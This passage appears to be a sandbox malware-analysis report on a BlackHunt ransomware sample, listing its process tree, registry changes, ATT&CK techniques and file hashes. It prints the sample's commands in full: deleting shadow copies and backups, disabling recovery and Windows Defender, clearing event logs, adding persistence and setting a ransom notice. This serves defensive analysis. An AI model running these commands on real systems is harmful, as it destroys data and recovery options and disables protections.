2888 wrote to memory of 2592 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 135 PID 2888 wrote to memory of 2592 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 135 PID 2888 wrote to memory of 2592 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 135 PID 2888 wrote to memory of 2704 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 134 PID 2888 wrote to memory of 2704 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 134 PID 2888 wrote to memory of 2704 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 134 PID 2888 wrote to memory of 2704 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 134 PID 2888 wrote to memory of 2512 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 132 PID 2888 wrote to memory of 2512 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 132 PID 2888 wrote to memory of 2512 2888 a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe 132 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe"C:\Users\Admin\AppData\Local\Temp\a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2888 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:1816
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2932
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:2128
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:940
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2688
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1224
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1644
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1360
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1072
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:540
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2108
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2124
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2060
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2976
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2076
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe" /F2⤵PID:2372
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2352
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1472
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2516
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1700
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1956
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1812
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1972
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1588
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2708
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1964
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3036
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2500
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2528
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2512
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2704
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2592
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2768
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2724
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2952
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2648
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2684
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2644
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2564
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2916
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2028
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2040
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:1416
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:1452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:3236
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:2696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:2088
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:2788
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1992
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3960
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2172
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2300
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:3492
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:860
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3504
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2128
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:3220
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:3944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:3804
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:2584
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:3896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:3372
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:3848
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe"2⤵
- Deletes itself
PID:1648 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:2256
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:2644
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:3480
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:3348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:3324
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:3548
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:1820
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:3332
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2620
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:3916
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2668
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:3256
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:3104
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:1280
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:1788
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:2572
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:2600
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f1⤵PID:1376
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4012
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB1⤵
- Interacts with shadow copies
PID:4004
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:3948
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f1⤵PID:2496
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable1⤵PID:3940
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3404
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:2720
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet1⤵
- Deletes backup catalog
PID:1612
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1596
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:1092
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f1⤵PID:1080
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2796
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded1⤵
- Interacts with shadow copies
PID:3932
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1720
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2456
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\a56e0df6a1cd46a4ceb06bbb332ff301dd0c4b163ca43630a6e544992b44e206.exe" /F1⤵
- Creates scheduled task(s)
PID:1904
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f1⤵PID:1992
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f1⤵PID:2576
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f1⤵PID:1816
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:800
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f1⤵PID:1476
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f1⤵PID:2472
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f1⤵PID:2664
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:2496
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f1⤵PID:1496
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f1⤵PID:2296
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f1⤵PID:2856
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:2552
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f1⤵PID:2524
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f1⤵PID:1476
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f1⤵PID:1672
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f1⤵PID:2180
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f1⤵PID:764
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f1⤵
- Modifies Windows Defender Real-time Protection settings
PID:2880
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2049301435-37821176916985006921747087043-1899069471-1350021524-1580747569-1160007946"1⤵PID:2576
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f1⤵PID:2520
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f1⤵PID:2476
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f1⤵
- Adds Run key to start application
PID:2456
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-59317298316151934511297151072629921101939984539-1973722483355143066-846482526"1⤵PID:2664
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f1⤵
- Modifies registry class
PID:2584
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f1⤵
- Modifies registry class
PID:2292
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\1⤵PID:3088
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3852
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3004
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "156324913605367648-17410950611592759862-14659921591347972637-829088033710858461"1⤵PID:3948
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3044
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-256031986-17501527981265684414-437445020-1636873618-2441596501582711713-1098299008"1⤵PID:2296
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5ec1351123dd9c9de4c168e2394991e1c
SHA1083849974bb1f5650e875b46b1fe293d12b3ae38
SHA2565b8023f45588de73ce11cadec00c95be4c7ad7580af5dc4421ffc18a56fef1df
SHA51212f125a0643a08a8aff5b84d7fed9856ca3cc73823032c88a064d115a7a25d8ccd6d50e14c6862187cf7a63fbaf4b4f81bae7a1dd1c680988513a71e4c2086f5
-
Filesize
12KB
MD52fc9e0a5c230ca8d281588e96d538aa6
SHA18c22e54733506fe9d9e4e4f1111e970539382eb5
